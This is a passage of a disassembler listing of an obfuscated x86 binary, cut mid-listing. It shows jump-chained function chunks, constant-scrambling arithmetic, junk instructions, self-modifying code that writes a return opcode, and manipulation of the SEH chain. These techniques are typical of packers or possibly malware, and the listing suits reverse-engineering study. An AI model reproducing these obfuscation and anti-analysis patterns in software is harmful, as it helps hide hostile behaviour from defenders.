		push	8DA578DDh
		pop	eax
		rol	eax, 18h
		cmp	eax, 77120851h
		jmp	loc_4596CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_447708:				; CODE XREF: sub_44DB59:loc_454AABj
		cmp	byte ptr [eax],	0F1h
		jnz	loc_453FAE
		jmp	loc_43E8E1
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449488

loc_447716:				; CODE XREF: sub_449488:loc_44FBA3j
		add	eax, 8C131466h
		xchg	eax, [esp+4+var_4]
		jmp	loc_43ED9E
; END OF FUNCTION CHUNK	FOR sub_449488
; ---------------------------------------------------------------------------
		jmp	ds:off_41E048
; ---------------------------------------------------------------------------

loc_44772A:				; CODE XREF: k2vbe3.d:00447165j
		jmp	locret_4414BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449488

loc_44772F:				; CODE XREF: sub_449488:loc_43ED9Ej
					; k2vbe3.d:loc_454A2Ej	...
		push	offset loc_45579C
		jmp	nullsub_96
; END OF FUNCTION CHUNK	FOR sub_449488
; ---------------------------------------------------------------------------

loc_447739:				; CODE XREF: k2vbe3.d:loc_4599B8j
		mov	[ecx], eax
		jmp	loc_450629
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C74D

loc_447740:				; CODE XREF: sub_44C74D:loc_44C757j
		mov	eax, [ebp-4]
		pop	ecx
		pop	ebp
		retn	4
; END OF FUNCTION CHUNK	FOR sub_44C74D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_447748:				; CODE XREF: sub_455C7A-AD84j
		jmp	loc_45AF9E
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448472

loc_44774D:				; CODE XREF: sub_448472+Ej
		jmp	loc_45B0FF
; END OF FUNCTION CHUNK	FOR sub_448472
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B2

loc_447752:				; CODE XREF: sub_4490B2-46C1j
		jmp	loc_4550E7
; END OF FUNCTION CHUNK	FOR sub_4490B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440CA

loc_447757:				; CODE XREF: sub_4440CA+Bj
		jmp	loc_44B885
; END OF FUNCTION CHUNK	FOR sub_4440CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C04E

loc_44775C:				; CODE XREF: sub_4437D3+2j
					; sub_456541-A426j ...
		mov	edx, [esp+0]
		mov	al, 1
		jmp	loc_44C7E3
; END OF FUNCTION CHUNK	FOR sub_43C04E
; ---------------------------------------------------------------------------
		jge	loc_44E858
		sbb	edi, 0B7E741D6h
		jmp	sub_4423D2
; ---------------------------------------------------------------------------
		add	ebx, esi
		sbb	ebx, 0ED00FC29h
		jmp	loc_4577E4
; ---------------------------------------------------------------------------
		call	sub_43F0FF
; START	OF FUNCTION CHUNK FOR sub_4523BE

loc_447789:				; CODE XREF: sub_4523BE-AD9Fj
		jmp	loc_43D72C
; END OF FUNCTION CHUNK	FOR sub_4523BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44778E:				; CODE XREF: sub_44B94B-B7F2j
		call	sub_45064D

loc_447793:				; CODE XREF: k2vbe3.d:0045A583j
		add	eax, 72C18FC5h
		jo	loc_443B82
		jmp	loc_44AAA1
; END OF FUNCTION CHUNK	FOR sub_44B94B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_165. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4477A5:				; CODE XREF: k2vbe3.d:00441941j
		jmp	loc_44E79C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E1E

loc_4477AA:				; CODE XREF: sub_446E1E+1j
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		push	5249D323h
		pop	eax
		add	eax, 0EC646838h
		xor	eax, 553EB39Eh
		add	eax, ebp
		jmp	loc_44836E
; END OF FUNCTION CHUNK	FOR sub_446E1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_4477C9:				; CODE XREF: sub_43DFE1+80A4j
					; k2vbe3.d:0044C524j
		rol	eax, 17h
		add	eax, 38A3B17Fh
		add	eax, ebp
		add	eax, 5ADC81CEh
		call	sub_4530DF

loc_4477DF:				; CODE XREF: sub_4506C3+5C08j
		jmp	loc_44A35F
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------

loc_4477E4:				; CODE XREF: k2vbe3.d:loc_44AB6Ej
		jmp	loc_451495
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_4477E9:				; CODE XREF: sub_4468FE-4E99j
		jbe	loc_45367A
		add	ebx, 3E2CC0F7h
		jmp	loc_45799F
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_4477FA:				; CODE XREF: sub_44B2D7:loc_456BC4j
		jnz	loc_4593F7
		jmp	loc_44A931
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449312

loc_447805:				; CODE XREF: sub_449312+DE96j
		xchg	eax, [ebp+0]

loc_447808:				; CODE XREF: sub_449312:loc_43C513j
		pop	large dword ptr	fs:0
		add	esp, 4
		push	47F87AFFh
		pop	eax
		and	eax, 64672D9Fh
		add	eax, 0BB9FD7B3h
		call	sub_45A078
; END OF FUNCTION CHUNK	FOR sub_449312
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_447829:				; CODE XREF: sub_43C865+1C4CFj
		jmp	loc_45751D
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------

loc_44782E:				; CODE XREF: k2vbe3.d:00457217j
		jmp	loc_4542D6
; ---------------------------------------------------------------------------

loc_447833:				; CODE XREF: k2vbe3.d:00453185j
		jmp	loc_4452AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_447838:				; CODE XREF: sub_44C90E+8420j
		jnz	loc_444C96
		jmp	loc_45AC77
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_447843:				; CODE XREF: sub_456541:loc_44B53Dj
		cmp	dword ptr [ebp-14h], 6
		setz	al
		call	sub_456A5F
; END OF FUNCTION CHUNK	FOR sub_456541
; START	OF FUNCTION CHUNK FOR sub_44D316

loc_44784F:				; CODE XREF: sub_44D316:loc_451C51j
		pop	ecx
		shl	eax, 3
		jmp	loc_44DC7E
; END OF FUNCTION CHUNK	FOR sub_44D316
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BB9D

loc_447858:				; CODE XREF: sub_45BB9D-E86Fj
		not	ebx
		cdq
		adc	edx, ebx
		shr	eax, 1Ah
		jmp	loc_459756
; END OF FUNCTION CHUNK	FOR sub_45BB9D
; ---------------------------------------------------------------------------
		jo	loc_4548DA
		pop	edi
		jmp	sub_45451C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_447871:				; CODE XREF: sub_44D0D5-6FDDj
		pop	eax
		rol	eax, 1
		sub	eax, 5E0A12D4h
		add	eax, 0DE1D317h
		or	eax, ds:4000EEh
		test	eax, 8
		jmp	loc_451350
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
		push	offset sub_4539B3
		jmp	locret_4511C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_44789B:				; CODE XREF: sub_442DF0+E70Dj
		call	sub_44D594
		push	offset loc_44DF55
		jmp	loc_454A49
; END OF FUNCTION CHUNK	FOR sub_442DF0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_159. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4478AB	proc near		; DATA XREF: k2vbe3.d:00448E42o

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00443F39 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044BD96 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004528E0 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00454BBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045527A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456C4C SIZE 00000008 BYTES

		js	loc_45527A
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]
		push	edi

loc_4478BC:				; CODE XREF: k2vbe3.d:004476E9j
		push	0ADCE4FEBh
		jmp	loc_443F39
sub_4478AB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4478C6	proc near		; CODE XREF: sub_44091B:loc_454ABBp
					; k2vbe3.d:00457600j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00459BDA SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	esi, [esp-4+arg_0]
		push	0
		push	offset sub_44CA4E
		jmp	loc_459BDA
sub_4478C6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_4478D9:				; CODE XREF: sub_44B870-4B70j
		cdq
; END OF FUNCTION CHUNK	FOR sub_44B870
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4478DA:				; CODE XREF: sub_45A323-A1DAj
		xchg	ebx, edx
		xchg	ebp, [esi]

loc_4478DE:				; CODE XREF: sub_44F028+D0E8j
		jmp	loc_452EA3
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_4478E3:				; DATA XREF: sub_4545C4:loc_443F75o
		push	esi
		mov	esi, eax
		xchg	esi, [esp]
		push	6A7DDA1Eh
		jmp	loc_459359

; =============== S U B	R O U T	I N E =======================================



sub_4478F3	proc near		; CODE XREF: k2vbe3.d:0043F60Aj
					; sub_450064+Ep
		xchg	ebx, [esp+0]
		pop	ebx
		push	eax
		push	offset loc_45B220
		jmp	loc_4541B2
sub_4478F3	endp

; ---------------------------------------------------------------------------

loc_447902:				; CODE XREF: k2vbe3.d:00454F12j
		sub	ebx, edi
		popf
		or	esi, 4CE3C1Ch
		push	9638F947h
		jmp	loc_4433F0
; ---------------------------------------------------------------------------

loc_447915:				; CODE XREF: k2vbe3.d:00448B75j
					; k2vbe3.d:loc_456A30j
		push	offset sub_44C1FD
		jmp	loc_455E73

; =============== S U B	R O U T	I N E =======================================



sub_44791F	proc near		; DATA XREF: sub_456A5F+9o
		add	esp, 0FFFFFFF8h
		mov	[ebp-1], al
		push	offset loc_43D976

loc_44792A:				; CODE XREF: sub_45000F:loc_44B54Cj
		jmp	nullsub_44
sub_44791F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_44792F:				; CODE XREF: sub_446258:loc_44B577j
		sub	edi, 9DA140C1h
		and	edi, 5E7ECE26h
		cmp	edi, 6E3EE36Eh
		jmp	loc_450B30
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------

loc_447946:				; CODE XREF: k2vbe3.d:00456285j
		push	eax
		push	717F9CB2h
		pop	eax
		or	eax, 0D0615D39h
		add	eax, 7FCB32B4h
		sub	eax, 465F96BFh
		test	eax, 10000h
		jmp	loc_45216A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_44796A:				; CODE XREF: sub_44E90D-E824j
		mov	eax, [eax]
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		call	sub_44C90E

loc_447977:				; CODE XREF: sub_45530F+3569j
		jmp	nullsub_152
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------

locret_44797C:				; CODE XREF: k2vbe3.d:loc_455E73j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_44797D:				; CODE XREF: sub_44BDBB+BAEEj
		jmp	loc_44351D
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD32

loc_447982:				; CODE XREF: sub_43CD32+6ED6j
		jmp	loc_45A33E
; END OF FUNCTION CHUNK	FOR sub_43CD32
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_447988:				; CODE XREF: k2vbe3.d:00449406j
		jmp	loc_4531E3
; ---------------------------------------------------------------------------
		db 68h,	43h, 7Dh
dword_447990	dd 0			; DATA XREF: sub_454463-87C9w
					; k2vbe3.d:loc_45629Dr
dword_447994	dd 172928A6h, 636C46h	; DATA XREF: sub_43FE19+6o
					; k2vbe3.d:0044B2A8o
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB7E

loc_44799C:				; CODE XREF: k2vbe3.d:loc_43FAC2j
					; sub_45AB7E-8EF8j
		jmp	loc_45BF6B
; END OF FUNCTION CHUNK	FOR sub_45AB7E

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4479A1	proc near		; CODE XREF: k2vbe3.d:0043D18Dj
					; sub_44A6BD:loc_43D5D6p ...

var_806		= byte ptr -806h
var_805		= byte ptr -805h
var_804		= byte ptr -804h
var_803		= byte ptr -803h
var_802		= byte ptr -802h
var_801		= byte ptr -801h
var_28		= dword	ptr -28h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D745 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B06 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00442D9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004451B5 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004464C1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447156 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447355 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004474D8 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004480BA SIZE 00000038 BYTES
; FUNCTION CHUNK AT 0044CC20 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004511C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453863 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045432B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454883 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00454E7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B34 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00458EBC SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		jmp	loc_4480BA
sub_4479A1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_4479AC:				; CODE XREF: sub_4424CF-B1Ej
		test	ebx, 0C5DFFFEDh
		jmp	loc_446E82
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
		push	35AD4240h
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_4479BC:				; CODE XREF: sub_44921C:loc_44927Bj
		xchg	ebx, [ebp+0]
		jmp	sub_44D6B7
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------

locret_4479C4:				; CODE XREF: k2vbe3.d:loc_44B0DDj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_4479C5:				; CODE XREF: sub_441885+Ej
		jmp	loc_4409DF
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------

loc_4479CA:				; CODE XREF: k2vbe3.d:00448C94j
		js	nullsub_258
		mov	[ebp+0], edx
		sub	ebx, 1822E25Dh
		jmp	loc_4540DD
; ---------------------------------------------------------------------------
		rol	ecx, 3
		add	edi, edx
		jmp	sub_449006
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_4479E8:				; CODE XREF: sub_44DB59+13j
		jz	loc_453FA9
		jmp	loc_44282C
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_4479F3:				; CODE XREF: k2vbe3.d:loc_4468EDj
					; sub_452CF7:loc_45A54Ej
		shl	ecx, 0Fh
		xchg	ecx, [esi]
		or	esi, 1CB70228h
		jmp	loc_454FB8
; END OF FUNCTION CHUNK	FOR sub_452CF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4561C3

loc_447A03:				; CODE XREF: sub_4561C3-1A03Dj
		add	ecx, 0CF828B18h
		mov	[ecx], eax
		pop	ecx
		push	offset sub_43C68E
		jmp	loc_4413FF
; END OF FUNCTION CHUNK	FOR sub_4561C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_447A16:				; CODE XREF: sub_4461D5+7j
		adc	edi, esi
		jns	loc_44BF8F
; END OF FUNCTION CHUNK	FOR sub_4461D5
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_447A1E:				; CODE XREF: sub_43D7A9:loc_440AAFj
		lea	eax, [ebp-800h]
		push	ebp
		mov	ebp, eax
		jmp	loc_451EAD
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_447A2C:				; CODE XREF: sub_43DFE1+11777j
		pop	ecx
		sub	ecx, 0FA5AB0Fh
		and	ecx, 0A12BEC91h
		add	ecx, 0E023AC12h
		xchg	ecx, [esp+0]
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E542

loc_447A47:				; CODE XREF: sub_44E542:loc_447E8Bj
		jz	loc_452B88
		jmp	loc_457058
; END OF FUNCTION CHUNK	FOR sub_44E542
; ---------------------------------------------------------------------------

loc_447A52:				; CODE XREF: k2vbe3.d:loc_449B17j
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_445047
		mov	eax, 7DA6ACC0h
		call	sub_4553CC
		jmp	loc_45B12D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_447A6B:				; CODE XREF: sub_4582DD:loc_441A04j
		js	loc_457408

loc_447A71:				; CODE XREF: k2vbe3.d:00450BA7j
		sub	al, 99h
		push	0BA818941h
		pop	edx
		jmp	loc_4549D4
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------

loc_447A7E:				; CODE XREF: k2vbe3.d:00442C07j
		cmp	edx, ecx
		jmp	loc_444BBD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A992

loc_447A85:				; CODE XREF: sub_44A992+DEA6j
		xchg	ebx, [esp+0]
		jmp	loc_453F93
; END OF FUNCTION CHUNK	FOR sub_44A992
; ---------------------------------------------------------------------------

locret_447A8D:				; CODE XREF: k2vbe3.d:00449E42j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_447A8E:				; CODE XREF: sub_44B870-853j
		jmp	loc_44BA48
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_447A93:				; CODE XREF: sub_450F71:loc_4570E2j
		xor	edx, edx
		push	edx
		push	eax
		push	65D1FDCCh
		jmp	loc_43F6E3
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		adc	eax, 44FD2DABh
		jmp	sub_43D83F
; ---------------------------------------------------------------------------

loc_447AAC:				; CODE XREF: k2vbe3.d:0043CE5Cj
		and	edi, ebp
; START	OF FUNCTION CHUNK FOR sub_43E470

loc_447AAE:				; CODE XREF: sub_43E470:loc_43CE43j
		xor	eax, 3907A3A4h
		add	eax, ebp
		push	edx
		jmp	loc_454AA6
; END OF FUNCTION CHUNK	FOR sub_43E470
; ---------------------------------------------------------------------------

loc_447ABC:				; CODE XREF: k2vbe3.d:00459295j
		and	eax, ebp
		adc	ebx, ebp
; START	OF FUNCTION CHUNK FOR sub_453100

loc_447AC0:				; CODE XREF: sub_453100:loc_45927Bj
		add	eax, 4AF0064Eh
		or	eax, 173C3CBh
		add	eax, 0BA49F0D8h
		xchg	eax, [esp+0]
		jmp	loc_440C28
; END OF FUNCTION CHUNK	FOR sub_453100

; =============== S U B	R O U T	I N E =======================================



sub_447ADA	proc near		; DATA XREF: sub_44146B+4o

; FUNCTION CHUNK AT 0044B247 SIZE 00000005 BYTES

		neg	eax
		push	edi

loc_447ADD:				; CODE XREF: k2vbe3.d:loc_44275Fj
		mov	edi, ebx
		push	offset sub_442FB6
		jmp	loc_44B247
sub_447ADA	endp

; ---------------------------------------------------------------------------

loc_447AE9:				; CODE XREF: k2vbe3.d:00444E66j
		popf
		push	offset sub_454EBB
		jmp	loc_442190
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_102. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44367E

loc_447AF5:				; CODE XREF: sub_44367E+8BD2j
		jmp	nullsub_74
; END OF FUNCTION CHUNK	FOR sub_44367E
; ---------------------------------------------------------------------------

loc_447AFA:				; CODE XREF: k2vbe3.d:0044C0DBj
		jmp	loc_457B22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E73

loc_447AFF:				; CODE XREF: sub_443E73+59E7j
		jmp	sub_445047
; END OF FUNCTION CHUNK	FOR sub_443E73
; ---------------------------------------------------------------------------

locret_447B04:				; CODE XREF: k2vbe3.d:loc_441363j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_447B05:				; CODE XREF: sub_43CCD0+C573j
		jmp	loc_44235E
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3C0

loc_447B0A:				; CODE XREF: sub_44B3C0-701Fj
		add	ecx, 902B0014h
		xchg	ecx, [esp+8+var_8]
		jmp	sub_45325C
; END OF FUNCTION CHUNK	FOR sub_44B3C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_447B18:				; CODE XREF: sub_44E481-8FCFj
		jz	loc_443A7E
		jmp	loc_45699A
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------
		xor	esi, edi
		jmp	sub_4437FB
; ---------------------------------------------------------------------------

loc_447B2A:				; DATA XREF: k2vbe3.d:0043CE2Co
		xor	eax, eax
		push	esi
		push	0BD0DF4E9h
		pop	esi
		jmp	loc_44936D
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_4504F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_447B3E:				; CODE XREF: sub_44471B:loc_443097j
		add	edi, 56B67EA4h
		cmp	edi, 7C86E795h
		jmp	loc_45BC93
; END OF FUNCTION CHUNK	FOR sub_44471B

; =============== S U B	R O U T	I N E =======================================



sub_447B4F	proc near		; DATA XREF: sub_4471DC-5E5Bo
		mov	ds:dword_41E0F0, eax
		lea	eax, nullsub_465
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_465
sub_447B4F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471DC

loc_447B63:				; CODE XREF: sub_4471DC+1j
		mov	eax, [esp+0]
		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		jmp	loc_445055
; END OF FUNCTION CHUNK	FOR sub_4471DC

; =============== S U B	R O U T	I N E =======================================



sub_447B71	proc near		; CODE XREF: k2vbe3.d:00443AEDj
					; sub_43CCD0+18744p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004552E2 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	edi, [esp-4+arg_0]
		jmp	loc_4552E2
sub_447B71	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_447B7D:				; CODE XREF: k2vbe3.d:0044CCF6j
		retn
; ---------------------------------------------------------------------------

loc_447B7E:				; CODE XREF: k2vbe3.d:0044D246j
		jmp	loc_4554B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B251

loc_447B83:				; CODE XREF: sub_44B251+3j
		jmp	sub_44E90D
; END OF FUNCTION CHUNK	FOR sub_44B251
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_247. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_447B89:				; CODE XREF: sub_443EF6-4A62j
		jge	loc_451FCE

loc_447B8F:				; CODE XREF: sub_44C5E3+7j
		jmp	sub_44B4E4
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------
		not	ebx
		test	ebx, ebp
		jmp	loc_44A039
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_447B9D:				; CODE XREF: sub_4423D2+15361j
		mov	[edi], ebp
		mov	esi, [ebp+0]
		push	esi
		jmp	loc_452B2B
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_447BA8:				; CODE XREF: k2vbe3.d:0043C4ACj
					; sub_443EF6:loc_458D16j
		add	ebx, 187365D7h
		xchg	ebx, [esp+4+var_4]
		jmp	loc_455969
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D16B

loc_447BB6:				; CODE XREF: sub_44D16B+13j
		and	ecx, 6F8A8CFBh
		add	ecx, 313FE26Eh
		add	ecx, ebp
		add	ecx, 8A381181h
		mov	ecx, [ecx]
		jmp	loc_448CB7
; END OF FUNCTION CHUNK	FOR sub_44D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EDE6

loc_447BD1:				; CODE XREF: sub_43EDE6+104BCj
		jl	loc_453F09

loc_447BD7:				; CODE XREF: sub_43FCA0+10A3Dj
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_43EDE6
; ---------------------------------------------------------------------------

loc_447BDC:				; CODE XREF: k2vbe3.d:004492FCj
		jmp	loc_454275
; ---------------------------------------------------------------------------
		cmp	ebx, edi
		jmp	loc_453EF1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_33. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_447BE9	proc near		; CODE XREF: sub_45AB7E-1C161j
					; sub_44C579:loc_43EAD0j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441588 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443B2D SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044DB3D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00458C95 SIZE 00000016 BYTES

		push	ebp
		mov	ebp, esp
		push	edx
		mov	edx, ecx
		xchg	edx, [esp+4+var_4]
		jmp	loc_44DB3D
sub_447BE9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_447BF7:				; CODE XREF: sub_4460FD+B50j
		jb	loc_449C03

loc_447BFD:				; CODE XREF: sub_4460FD:loc_4532F8j
		rol	ecx, 0Bh
		and	ecx, 2BE427F2h
		add	ecx, 0FEA18783h
		xchg	ecx, [esp+0]
		jmp	loc_453FD6
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A306

loc_447C14:				; CODE XREF: sub_44A306+107C1j
		jz	loc_44F2D5
		jmp	loc_442DFE
; END OF FUNCTION CHUNK	FOR sub_44A306
; ---------------------------------------------------------------------------

loc_447C1F:				; CODE XREF: k2vbe3.d:loc_458AC9j
		test	ebx, 0A28E732Fh
		jmp	loc_44022A
; ---------------------------------------------------------------------------
		adc	ebp, ecx
		jmp	sub_44C564
; ---------------------------------------------------------------------------

loc_447C31:				; CODE XREF: k2vbe3.d:004533D1j
		add	eax, 96AB028Eh
		call	sub_447E80
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_447C3C:				; CODE XREF: sub_43D823:loc_44D7F2j
		or	edi, edx
		jmp	loc_444625
; END OF FUNCTION CHUNK	FOR sub_43D823

; =============== S U B	R O U T	I N E =======================================



sub_447C43	proc near		; CODE XREF: sub_447C43-8F00p
					; k2vbe3.d:0044E1E5j

; FUNCTION CHUNK AT 0043ED38 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 004433FE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00446541 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044AA82 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044B82A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044BEBF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DACD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00455819 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456820 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00459884 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
